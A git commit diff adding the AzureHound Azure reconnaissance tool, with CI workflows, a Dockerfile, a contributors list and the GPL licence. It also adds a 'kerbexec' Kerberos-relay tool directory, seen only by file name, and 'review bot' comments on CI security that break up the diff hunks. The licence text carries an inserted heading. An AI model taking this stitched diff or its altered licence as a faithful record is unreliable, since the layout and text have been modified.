enums/serviceprincipaltype.go create mode 100644 enums/share_permissions.go create mode 100644 enums/signinaudience.go create mode 100644 enums/signintype.go create mode 100644 enums/site_availability_state.go create mode 100644 enums/site_load_balancing.go create mode 100644 enums/sku_converstion_status.go create mode 100644 enums/sku_name.go create mode 100644 enums/spendinglimit.go create mode 100644 enums/ssl_state.go create mode 100644 enums/ssomode.go create mode 100644 enums/statuslevel.go create mode 100644 enums/storage_account_access_tier.go create mode 100644 enums/storage_account_provisioning_state.go create mode 100644 enums/storage_account_status.go create mode 100644 enums/storage_container_public_access.go create mode 100644 
enums/storagetype.go create mode 100644 enums/subscriptionstate.go create mode 100644 enums/tenantcategory.go create mode 100644 enums/trusttype.go create mode 100644 enums/usage_state.go create mode 100644 enums/vaultprovisioningstate.go create mode 100644 enums/vaultsku.go create mode 100644 enums/vmdeleteoption.go create mode 100644 enums/vmevictionpolicy.go create mode 100644 enums/vmpriority.go create mode 100644 go.mod create mode 100644 go.sum create mode 100644 internal/utils.go create mode 100644 kerbexec/__init__.py create mode 100644 kerbexec/clients/__init__.py create mode 100644 kerbexec/clients/httprelayclient.py create mode 100644 kerbexec/clients/ldaprelayclient.py create mode 100644 kerbexec/clients/smbrelayclient.py create mode 100644 kerbexec/exp/addspn.py create mode 100644 kerbexec/exp/dns.py create mode 100644 kerbexec/exp/printerbug.py create mode 100644 kerbexec/krb.gitignore create mode 100644 kerbexec/servers/__init__.py create mode 100644 kerbexec/servers/dnsrelayserver.py create mode 100644 kerbexec/servers/httprelayserver.py create mode 100644 kerbexec/servers/smbrelayserver.py create mode 100644 kerbexec/utils/__init__.py create mode 100644 kerbexec/utils/config.py create mode 100644 kerbexec/utils/kerberos.py create mode 100644 kerbexec/utils/krbcredccache.py create mode 100644 kerbexec/utils/spnego.py create mode 100644 logger/eventlog-transport_windows.go create mode 100644 logger/internal/logger.go create mode 100644 logger/internal/logger_test.go create mode 100644 logger/log.go create mode 100644 logger/log_windows.go create mode 100644 logger/utils.go create mode 100644 main.go create mode 100644 main_windows.go create mode 100644 models/app-member.go create mode 100644 models/app-owner.go create mode 100644 models/app-role-assignments.go create mode 100644 models/app.go create mode 100644 models/automation-account.go create mode 100644 models/azure-role-assignment.go create mode 100644 models/azure/access_policy_entry.go create 
mode 100644 models/azure/addin.go create mode 100644 models/azure/additional_capabilities.go create mode 100644 models/azure/additional_unattend_content.go create mode 100644 models/azure/alt_security_id.go create mode 100644 models/azure/api_application.go create mode 100644 models/azure/app_profile.go create mode 100644 models/azure/app_role.go create mode 100644 models/azure/app_role_assignment.go create mode 100644 models/azure/app_scope.go create mode 100644 models/azure/application.go create mode 100644 models/azure/assigned_label.go create mode 100644 models/azure/assigned_license.go create mode 100644 models/azure/assigned_plan.go create mode 100644 models/azure/auto_heal_rules.go create mode 100644 models/azure/automatic_replies_setting.go create mode 100644 models/azure/automation_account.go create mode 100644 models/azure/automation_account_properties.go create mode 100644 models/azure/automation_account_system_data.go create mode 100644 models/azure/available_patch_summary.go create mode 100644 models/azure/azure_files_identity_based_authentication.go create mode 100644 models/azure/azure_storage_info_value.go create mode 100644 models/azure/billing_profile.go create mode 100644 models/azure/blob_restore_status.go create mode 100644 models/azure/boot_diagnostics.go create mode 100644 models/azure/boot_diagnostics_instance_view.go create mode 100644 models/azure/capacity_reservation_profile.go create mode 100644 models/azure/cloning_info.go create mode 100644 models/azure/common.go create mode 100644 models/azure/connection_item_properties.go create mode 100644 models/azure/connection_string_info.go create mode 100644 models/azure/container_registry.go create mode 100644 models/azure/data_disk.go create mode 100644 models/azure/datetime_timezone.go create mode 100644 models/azure/descendant-info.go create mode 100644 models/azure/device.go create mode 100644 models/azure/diagnostics_profile.go create mode 100644 models/azure/diff_disk_settings.go create 
mode 100644 models/azure/directory_object.go create mode 100644 models/azure/disk_encryption_set_params.go create mode 100644 models/azure/disk_encryption_settings.go create mode 100644 models/azure/disk_instance_view.go create mode 100644 models/azure/employee_org_data.go create mode 100644 models/azure/encryption_properties.go create mode 100644 models/azure/entity.go create mode 100644 models/azure/extended_location.go create mode 100644 models/azure/function_app.go create mode 100644 models/azure/function_app_props.go create mode 100644 models/azure/geo_replication_stats.go create mode 100644 models/azure/group.go create mode 100644 models/azure/hardware_profile.go create mode 100644 models/azure/hosting_environment_profile.go create mode 100644 models/azure/hostname_ssl_state.go create mode 100644 models/azure/image_reference.go create mode 100644 models/azure/immutability_policy.go create mode 100644 models/azure/immutability_policy_properties.go create mode 100644 models/azure/immutable_policy_update_history.go create mode 100644 models/azure/immutable_storage_account.go create mode 100644 models/azure/immutable_storage_with_versioning.go create mode 100644 models/azure/implicit_grant_settings.go create mode 100644 models/azure/informational_url.go create mode 100644 models/azure/instance_view_status.go create mode 100644 models/azure/ip_rule.go create mode 100644 models/azure/ip_security_restriction.go create mode 100644 models/azure/key_credential.go create mode 100644 models/azure/key_value.go create mode 100644 models/azure/key_vault.go create mode 100644 models/azure/key_vault_key_ref.go create mode 100644 models/azure/key_vault_secret_ref.go create mode 100644 models/azure/keyvault_permissions.go create mode 100644 models/azure/last_patch_installation_summary.go create mode 100644 models/azure/license_assignment_state.go create mode 100644 models/azure/linux_config.go create mode 100644 models/azure/linux_patch_settings.go create mode 100644 
models/azure/locale_info.go create mode 100644 models/azure/logic_app.go create mode 100644 models/azure/logic_app_definition.go create mode 100644 models/azure/logic_app_parameter.go create mode 100644 models/azure/logic_app_properties.go create mode 100644 models/azure/logic_app_sku.go create mode 100644 models/azure/mailbox_settings.go create mode 100644 models/azure/maintenance_redeploy_status.go create mode 100644 models/azure/managed_by_tenant.go create mode 100644 models/azure/managed_cluster.go create mode 100644 models/azure/managed_cluster_properties.go create mode 100644 models/azure/managed_disk_params.go create mode 100644 models/azure/managed_identity.go create mode 100644 models/azure/management_group.go create mode 100644 models/azure/management_group_child_info.go create mode 100644 models/azure/management_group_details.go create mode 100644 models/azure/management_group_path_elem.go create mode 100644 models/azure/management_group_props.go create mode 100644 models/azure/name_value_pair.go create mode 100644 models/azure/network_interface_ref.go create mode 100644 models/azure/network_interface_reference_props.go create mode 100644 models/azure/network_profile.go create mode 100644 models/azure/network_rule_set.go create mode 100644 models/azure/object_identity.go create mode 100644 models/azure/onprem_ext_attributes.go create mode 100644 models/azure/onprem_provisioning_error.go create mode 100644 models/azure/optional_claims.go create mode 100644 models/azure/organization.go create mode 100644 models/azure/os_disk.go create mode 100644 models/azure/os_profile.go create mode 100644 models/azure/parent_group_info.go create mode 100644 models/azure/parental_controls_settings.go create mode 100644 models/azure/password_credential.go create mode 100644 models/azure/password_profile.go create mode 100644 models/azure/permission_scope.go create mode 100644 models/azure/plan.go create mode 100644 models/azure/preauthorized_application.go create mode 
100644 models/azure/privacy_profile.go create mode 100644 models/azure/private_endpoint.go create mode 100644 models/azure/private_endpoint_connection.go create mode 100644 models/azure/private_endpoint_connection_item.go create mode 100644 models/azure/private_endpoint_connection_properties.go create mode 100644 models/azure/private_endpoint_connection_resource.go create mode 100644 models/azure/private_link_service_connection_state.go create mode 100644 models/azure/provisioned_plan.go create mode 100644 models/azure/public_client_application.go create mode 100644 models/azure/push_settings.go create mode 100644 models/azure/required_resource_access.go create mode 100644 models/azure/resource_group.go create mode 100644 models/azure/resource_group_props.go create mode 100644 models/azure/resource_reference.go create mode 100644 models/azure/role.go create mode 100644 models/azure/role_assignment.go create mode 100644 models/azure/role_permission.go create mode 100644 models/azure/routing_preference.go create mode 100644 models/azure/saml_sso_settings.go create mode 100644 models/azure/sas_policy.go create mode 100644 models/azure/scheduled_events_profile.go create mode 100644 models/azure/security_profile.go create mode 100644 models/azure/service_principal.go create mode 100644 models/azure/site_config.go create mode 100644 models/azure/site_machine_key.go create mode 100644 models/azure/sku.go create mode 100644 models/azure/slot_swap_status.go create mode 100644 models/azure/spa_application.go create mode 100644 models/azure/ssh_config.go create mode 100644 models/azure/ssh_public_key.go create mode 100644 models/azure/storage_account.go create mode 100644 models/azure/storage_account_primary_endpoints.go create mode 100644 models/azure/storage_account_props.go create mode 100644 models/azure/storage_account_sku_conversion_status.go create mode 100644 models/azure/storage_container.go create mode 100644 models/azure/storage_container_legal_hold.go create mode 
100644 models/azure/storage_container_props.go create mode 100644 models/azure/storage_profile.go create mode 100644 models/azure/sub_resource.go create mode 100644 models/azure/subscription.go create mode 100644 models/azure/subscription_policies.go create mode 100644 models/azure/tenant.go create mode 100644 models/azure/terminate_notification_profile.go create mode 100644 models/azure/timezone_base.go create mode 100644 models/azure/uefi_settings.go create mode 100644 models/azure/unified_role_assignment.go create mode 100644 models/azure/unified_role_definition.go create mode 100644 models/azure/unified_role_permission.go create mode 100644 models/azure/user.go create mode 100644 models/azure/user_assigned_identity.go create mode 100644 models/azure/vault_certificate.go create mode 100644 models/azure/vault_props.go create mode 100644 models/azure/vault_secret_group.go create mode 100644 models/azure/verified_domain.go create mode 100644 models/azure/verified_publisher.go create mode 100644 models/azure/virtual_application.go create mode 100644 models/azure/virtual_hard_disk.go create mode 100644 models/azure/virtual_machine.go create mode 100644 models/azure/virtual_machine_agent_instance_view.go create mode 100644 models/azure/virtual_machine_extension.go create mode 100644 models/azure/virtual_machine_extension_handler_instance_view.go create mode 100644 models/azure/virtual_machine_extension_instance_view.go create mode 100644 models/azure/virtual_machine_health_status.go create mode 100644 models/azure/virtual_machine_instance_view.go create mode 100644 models/azure/virtual_machine_network_interface_config.go create mode 100644 models/azure/virtual_machine_patch_status.go create mode 100644 models/azure/virtual_machine_props.go create mode 100644 models/azure/virtual_network_rule.go create mode 100644 models/azure/vm_extension_props.go create mode 100644 models/azure/vm_gallery_app.go create mode 100644 models/azure/vm_ip_config_props.go create mode 100644 
models/azure/vm_ip_tag.go create mode 100644 models/azure/vm_network_interface_config_props.go create mode 100644 models/azure/vm_network_interface_dns_settings.go create mode 100644 models/azure/vm_network_interface_ip_config.go create mode 100644 models/azure/vm_public_ip_config.go create mode 100644 models/azure/vm_public_ip_config_props.go create mode 100644 models/azure/vm_public_ip_dns_settings.go create mode 100644 models/azure/vm_public_ip_sku.go create mode 100644 models/azure/vm_scale_set.go create mode 100644 models/azure/vm_size_props.go create mode 100644 models/azure/web_app.go create mode 100644 models/azure/web_application.go create mode 100644 models/azure/win_rm_config.go create mode 100644 models/azure/win_rm_listener.go create mode 100644 models/azure/windows_config.go create mode 100644 models/azure/windows_patch_settings.go create mode 100644 models/azure/working_hours.go create mode 100644 models/container-registry.go create mode 100644 models/device-owner.go create mode 100644 models/device.go create mode 100644 models/function-app.go create mode 100644 models/group-member.go create mode 100644 models/group-owner.go create mode 100644 models/group.go create mode 100644 models/ingest-request.go create mode 100644 models/job.go create mode 100644 models/key-vault-access-policy.go create mode 100644 models/key-vault-contributor.go create mode 100644 models/key-vault-kvcontributor.go create mode 100644 models/key-vault-owner.go create mode 100644 models/key-vault-role-assignment.go create mode 100644 models/key-vault-user-access-admin.go create mode 100644 models/key-vault.go create mode 100644 models/logic-app.go create mode 100644 models/managed-cluster.go create mode 100644 models/management-group-owner.go create mode 100644 models/management-group-role-assignment.go create mode 100644 models/management-group-user-access-admin.go create mode 100644 models/mgmt-group.go create mode 100644 models/resource-group-owner.go create mode 100644 
models/resource-group-role-assignment.go create mode 100644 models/resource-group-user-access-admin.go create mode 100644 models/resource-group.go create mode 100644 models/role-assignments.go create mode 100644 models/role.go create mode 100644 models/service-principal-owner.go create mode 100644 models/service-principal.go create mode 100644 models/storage-account.go create mode 100644 models/storage-container.go create mode 100644 models/subscription-owner.go create mode 100644 models/subscription-role-assignment.go create mode 100644 models/subscription-user-access-admin.go create mode 100644 models/subscription.go create mode 100644 models/task.go create mode 100644 models/tenant.go create mode 100644 models/update-client-request.go create mode 100644 models/user.go create mode 100644 models/utils.go create mode 100644 models/utils_test.go create mode 100644 models/virtual-machine-admin-login.go create mode 100644 models/virtual-machine-avere-contributor.go create mode 100644 models/virtual-machine-contributor.go create mode 100644 models/virtual-machine-owner.go create mode 100644 models/virtual-machine-role-assignment.go create mode 100644 models/virtual-machine-user-access-admin.go create mode 100644 models/virtual-machine-vmcontributor.go create mode 100644 models/virtual-machine.go create mode 100644 models/vm-scale-set.go create mode 100644 models/web-app.go create mode 100644 panicrecovery/panic_recovery.go create mode 100644 pipeline/pipeline.go create mode 100644 pipeline/pipeline_test.go create mode 100644 sec.gitignore create mode 100644 sinks/console.go create mode 100644 sinks/file.go delete mode 100644 test/1.jpg delete mode 100644 test/2.jpg delete mode 100644 test/3.jpeg delete mode 100644 test/4.jpg delete mode 100644 test/5.jpg delete mode 100644 test/6.jpg delete mode 100644 test/SlidesIndex.html delete mode 100644 test/styles.css diff --git a/.all-contributorsrc b/.all-contributorsrc new file mode 100644 index 0000000..fd96b1e --- /dev/null 
+++ b/.all-contributorsrc 
@@ -0,0 +1,97 @@
+{
+ "projectName": "AzureHound",
+ "projectOwner": "BloodHoundAD",
+ "repoType": "github",
+ "repoHost": "https://github.com",
+ "files": [
+ "CONTRIBUTORS.md"
+ ],
+ "imageSize": 100,
+ "commit": true,
+ "commitConvention": "none",
+ "contributors": [
+ {
+ "login": "andyrobbins",
+ "name": "Andy Robbins",
+ "avatar_url": "https://avatars.githubusercontent.com/u/842644?v=4",
+ "profile": "https://www.twitter.com/_wald0",
+ "contributions": [
+ "ideas",
+ "design",
+ "blog",
+ "content",
+ "doc"
+ ]
+ },
+ {
+ "login": "ddlees",
+ "name": "Dillon Lees",
+ "avatar_url": "https://avatars.githubusercontent.com/u/8984872?v=4",
+ "profile": "https://github.com/ddlees",
+ "contributions": [
+ "code",
+ "maintenance",
+ "ideas",
+ "design"
+ ]
+ },
+ {
+ "login": "rvazarkar",
+ "name": "Rohan Vazarkar",
+ "avatar_url": "https://avatars.githubusercontent.com/u/5720446?v=4",
+ "profile": "https://blog.cptjesus.com/",
+ "contributions": [
+ "code",
+ "maintenance"
+ ]
+ },
+ {
+ "login": "urangel",
+ "name": "Ulises Rangel",
+ "avatar_url": "https://avatars.githubusercontent.com/u/16910931?v=4",
+ "profile": "https://ulises.io/",
+ "contributions": [
+ "code",
+ "maintenance"
+ ]
+ },
+ {
+ "login": "joshgantt",
+ "name": "joshgantt",
+ "avatar_url": "https://avatars.githubusercontent.com/u/29784250?v=4",
+ "profile": "https://github.com/joshgantt",
+ "contributions": [
+ "code",
+ "maintenance"
+ ]
+ },
+ {
+ "login": "hugo-syn",
+ "name": "hugo-syn",
+ "avatar_url": "https://avatars.githubusercontent.com/u/61210734?v=4",
+ "profile": "https://github.com/hugo-syn",
+ "contributions": [
+ "code"
+ ]
+ },
+ {
+ "login": "crimike",
+ "name": "crimike",
+ "avatar_url": "https://avatars.githubusercontent.com/u/10261812?v=4",
+ "profile": "https://github.com/crimike",
+ "contributions": [
+ "code"
+ ]
+ },
+ {
+ "login": "0xffhh",
+ "name": "0xffhh",
+ "avatar_url": "https://avatars.githubusercontent.com/u/56194755?v=4",
+ "profile": "https://github.com/0xffhh",
+ "contributions": [
+ "code"
+ ]
+ }
+ ],
+ "contributorsPerLine": 7
+}
diff --git a/.dockerignore b/.dockerignore
new file mode 100644
index 0000000..aa10ef9
--- /dev/null
+++ b/.dockerignore
@@ -0,0 +1,2 @@
+logs
+*.log
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
new file mode 100644
index 0000000..f6342c0
--- /dev/null
+++ b/.github/workflows/build.yml
@@ -0,0 +1,112 @@
+name: Build
+
+on:
+ push:
+ branches: [ main ]
+ pull_request:
+ branches: [ main ]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ defaults:
+ run:
+ shell: bash
+ steps:
+ - uses: actions/checkout@v3
+
+ - name: Setup Go
+ uses: actions/setup-go@v3
+ with:
+ go-version-file: go.mod
+ check-latest: true
+ cache: true
+
+ - name: Test
+ run: go test ./...
+
+ containerize:
+ runs-on: ubuntu-latest
+ permissions:
+ packages: write
+ defaults:
+ run:
+ shell: bash
+ steps:
+ - uses: actions/checkout@v3
+
+ - name: Log in to the Container registry
+ uses: docker/login-action@f054a8b539a109f9f41c372932f1ae047eff08c9
+ with:
+ registry: ghcr.io
+ username: ${{ github.actor }}
+ password: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: Extract metadata
+ id: meta
+ uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38
+ with:
+ images: ghcr.io/bloodhoundad/azurehound
+ tags: |
+ type=edge,branch=main
+
+ - name: Build Container Image
+ uses: docker/build-push-action@v3
+ with:
+ context: .
+ build-args: VERSION=v0.0.0-rolling+${{ github.sha }}
+ tags: ${{ steps.meta.outputs.tags }}
+ labels: ${{ steps.meta.outputs.labels }}
+ push: ${{ ! startsWith(github.event_name, 'pull_request') }}
+
+ build:
+ runs-on: ubuntu-latest
+ defaults:
+ run:
+ shell: bash
+ strategy:
+ matrix:
+ os:
+ - darwin
+ - linux
+ - windows
+ arch:
+ - amd64
+ - arm64
+ steps:
+ - uses: actions/checkout@v3
+
+ - name: Setup Go
+ uses: actions/setup-go@v3
+ with:
+ go-version-file: go.mod
+ check-latest: true
+ cache: true
+
+ - name: Build
+ run: 'go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/v2/constants.Version=v0.0.0-rolling+${{ github.sha }}"'
+ env:
+ GOOS: ${{ matrix.os }}
+ GOARCH: ${{ matrix.arch }}
+
+ - name: Zip
+ if: "! startsWith(github.event_name, 'pull_request')"
+ run: 7z a -tzip -mx9 azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip azurehound*
+
+ - name: Compute Checksum
+ if: "! startsWith(github.event_name, 'pull_request')"
+ run: sha256sum azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip > azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256
+
+ - name: Update Rolling Release
+ if: "! startsWith(github.event_name, 'pull_request')"
+ uses: softprops/action-gh-release@v1
+ with:
+ name: Rolling Release (unstable)
+ tag_name: rolling
+ prerelease: true
+ files: |
+ azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip
+ azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256
+ body: |
+ Rolling release of AzureHound compiled from source (${{ github.sha }})
+ This is automatically kept up-to-date with the `${{ github.ref_name }}` ${{ github.ref_type }}
diff --git a/.github/workflows/cla.yml b/.github/workflows/cla.yml
new file mode 100644
index 0000000..c2c8b0c
--- /dev/null
+++ b/.github/workflows/cla.yml
@@ -0,0 +1,24 @@
+name: "CLA Assistant"
+on:
+ issue_comment:
+ types: [created]
+ pull_request_target:
+ types: [opened, closed, synchronize]
+
+jobs:
+ CLAssistant:
+ runs-on: ubuntu-latest
+ steps:
+ - name: "CLA Assistant"
+ if: (github.event.comment.body == 'recheck' || github.event.comment.body == 'I have read the CLA Document and I hereby sign the CLA') || github.event_name == 'pull_request_target'
+ uses: contributor-assistant/github-action@v2.3.1
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ PERSONAL_ACCESS_TOKEN: ${{ secrets.REPO_SCOPE }}
+ with:
+ path-to-signatures: "signatures.json"
+ path-to-document: "https://github.com/BloodHoundAD/CLA/blob/main/ICLA.md"
+ branch: "main"
+ remote-organization-name: BloodHoundAD
+ remote-repository-name: CLA
+ allowlist: dependabot[bot]
diff --git a/.github/workflows/jekyll-docker.yml b/.github/workflows/jekyll-docker.yml
deleted file mode 100644
index ee24716..0000000
--- a/.github/workflows/jekyll-docker.yml
+++ /dev/null
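Review bot: The steps that publish artifacts in build.yml run third-party actions from mutable tags (`softprops/action-gh-release@v1`, `docker/build-push-action@v3`), while `docker/login-action` and `docker/metadata-action` in the same file are pinned to full commit SHAs. The tag-referenced actions receive the job token and produce the released zips and images, so they should be pinned the same way, e.g. `uses: softprops/action-gh-release@<full-commit-sha> # v1`. The same tag references appear in publish.yml and, as `contributor-assistant/github-action@v2.3.1`, in cla.yml. The `test` and `build` jobs also declare no `permissions:` block and so inherit the repository's default token scope; a top-level `permissions:` with `contents: read`, plus `contents: write` only on the job that updates the release, would make the scope explicit.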
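Review bot: The `CLAssistant` job in cla.yml is triggered by `pull_request_target`, so for pull requests from forks it runs with the base repository's secrets, including the repository-scoped token passed as `PERSONAL_ACCESS_TOKEN: ${{ secrets.REPO_SCOPE }}`, and it declares no `permissions:` block. As far as this file shows, no step checks out or executes pull-request code, which is what keeps the trigger acceptable here. That constraint should be written down above the step, for example `# pull_request_target: runs with secrets; never check out or run PR head code in this job`. The job should also get an explicit `permissions:` block limited to the scopes the action documents as required, rather than the default token scope.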
@@ -1,20 +0,0 @@
-name: assets
-
-on:
- push:
- branches: [ "main" ]
- pull_request:
- branches: [ "main" ]
-
-jobs:
- build:
-
- runs-on: ubuntu-latest
-
- steps:
- - uses: actions/checkout@v3
- - name: Learning subscriber
- run: |
- docker run \
- -v ${{ github.workspace }}:/srv/jekyll -v ${{ github.workspace }}/_site:/srv/jekyll/_site \
- jekyll/builder:latest /bin/bash -c "chmod -R 777 /srv/jekyll && jekyll build --future"
diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml
new file mode 100644
index 0000000..da302ac
--- /dev/null
+++ b/.github/workflows/publish.yml
@@ -0,0 +1,85 @@
+name: Publish
+
+on:
+ push:
+ tags:
+ - "v*.*.*"
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ defaults:
+ run:
+ shell: bash
+ strategy:
+ matrix:
+ os:
+ - darwin
+ - linux
+ - windows
+ arch:
+ - amd64
+ - arm64
+ steps:
+ - uses: actions/checkout@v3
+
+ - name: Setup Go
+ uses: actions/setup-go@v3
+ with:
+ go-version-file: go.mod
+ check-latest: true
+ cache: true
+
+ - name: Build
+ run: 'go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/v2/constants.Version=${{ github.ref_name }}"'
+ env:
+ GOOS: ${{ matrix.os }}
+ GOARCH: ${{ matrix.arch }}
+
+ - name: Zip
+ run: 7z a -tzip -mx9 azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip azurehound*
+
+ - name: Compute Checksum
+ run: sha256sum azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip > azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256
+
+ - name: Upload Release
+ uses: softprops/action-gh-release@v1
+ with:
+ files: |
+ azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip
+ azurehound-${{ matrix.os }}-${{ matrix.arch }}.zip.sha256
+
+ containerize:
+ runs-on: ubuntu-latest
+ permissions:
+ packages: write
+ defaults:
+ run:
+ shell: bash
+ steps:
+ - uses: actions/checkout@v3
+
+ - name: Log in to the Container registry
+ uses: docker/login-action@f054a8b539a109f9f41c372932f1ae047eff08c9
+ with:
+ registry: ghcr.io
+ username: ${{ github.actor }}
+ password: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: Extract metadata
+ id: meta
+ uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38
+ with:
+ images: ghcr.io/bloodhoundad/azurehound
+ tags: |
+ type=semver,pattern={{version}},prefix=v
+ type=semver,pattern={{major}}.{{minor}},prefix=v
+
+ - name: Build Container Image
+ uses: docker/build-push-action@v3
+ with:
+ context: .
+ build-args: VERSION=${{ github.ref_name }}
+ tags: ${{ steps.meta.outputs.tags }}
+ labels: ${{ steps.meta.outputs.labels }}
+ push: true
diff --git a/.idea/.gitignore b/.idea/.gitignore
new file mode 100644
index 0000000..13566b8
--- /dev/null +++ b/.idea/.gitignore @@ -0,0 +1,8 @@ +# Default ignored files +/shelf/ +/workspace.xml +# Editor-based HTTP Client requests +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/.idea/AzureHound.iml b/.idea/AzureHound.iml new file mode 100644 index 0000000..5e764c4 --- /dev/null +++ b/.idea/AzureHound.iml @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file diff --git a/.idea/modules.xml b/.idea/modules.xml new file mode 100644 index 0000000..9dc1ccb --- /dev/null +++ b/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/.idea/vcs.xml b/.idea/vcs.xml new file mode 100644 index 0000000..94a25f7 --- /dev/null +++ b/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/.licenserc.yaml b/.licenserc.yaml new file mode 100644 index 0000000..378038d --- /dev/null +++ b/.licenserc.yaml @@ -0,0 +1,18 @@ +header: + license: + spdx-id: GPL-3.0-or-later + copyright-owner: Specter Ops, Inc. + software-name: AzureHound + paths: + - 'main.go' + paths-ignore: + - .git + - dist + - licenses + - '**/*.md' + + comment: on-failure + + dependency: + files: + - go.mod diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md new file mode 100644 index 0000000..85f5a30 --- /dev/null +++ b/CONTRIBUTORS.md @@ -0,0 +1,32 @@ + + +[![All Contributors](https://img.shields.io/badge/all_contributors-8-orange.svg?style=flat-square)](#contributors-) + +## Contributors ✨ + +Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)): + + + + + + + + + + + + + + + + + +

Andy Robbins

🤔 🎨 📝 🖋 📖

Dillon Lees

💻 🚧 🤔 🎨

Rohan Vazarkar

💻 🚧

Ulises Rangel

💻 🚧

joshgantt

💻 🚧

hugo-syn

💻

crimike

💻

0xffhh

💻
+ + + + + +
+This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome!
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..0824ddc
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,16 @@
+# syntax=docker/dockerfile:1
+
+FROM golang:1.20 as build
+WORKDIR /app
+
+ARG VERSION=v0.0.0
+ENV CGO_ENABLED=1
+
+COPY ./ ./
+RUN go mod download
+RUN go build -ldflags="-s -w -X github.com/BloodHoundAD/AzureHound/v2/constants.Version=$VERSION+docker"
+
+FROM gcr.io/distroless/base-debian12:nonroot
+LABEL org.opencontainers.image.source https://github.com/BloodHoundAD/AzureHound
+COPY --from=build /app/azurehound /
+ENTRYPOINT ["/azurehound"]
diff --git a/LICENSE b/LICENSE-SEC
similarity index 100%
rename from LICENSE
rename to LICENSE-SEC
diff --git a/LICENSE.md b/LICENSE.md
new file mode 100644
index 0000000..fe9d499
--- /dev/null
+++ b/LICENSE.md
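Review bot: The `-X` target in the Dockerfile's `go build` line, `github.com/BloodHoundAD/AzureHound/v2/constants.Version`, differs in case from the path used by both workflows in this patch (`github.com/bloodhoundad/azurehound/v2/constants.Version`). Go import paths are case-sensitive and the linker silently ignores an `-X` that names no matching package variable, so one of the two build routes will ship a binary that reports the default version instead of the injected one. go.mod is not visible in this part of the patch; if its module path is the lower-case form, the line should read `RUN go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/v2/constants.Version=$VERSION+docker"`. Separately, both `FROM` images are referenced by tag only; pinning them by digest would make the published image reproducible and auditable.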
@@ -0,0 +1,676 @@ +GNU GENERAL PUBLIC LICENSE + +Version 3, 29 June 2007 + +Copyright 2007 Free Software Foundation, Inc. [fsf](http://fsf.org/) +Everyone is permitted to copy and distribute verbatim copies +of this license document, but changing it is not allowed. + +# AzureHoundAD / `Main` + +The GNU General Public License is a free, copyleft license for +software and other kinds of works. + +The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + +When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + +To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + +For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. 
+ +Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + +For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + +Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + +Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + +The precise terms and conditions for copying, distribution and +modification follow. + +TERMS AND CONDITIONS + +0. Definitions. + +"This License" refers to version 3 of the GNU General Public License. + +"Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. 
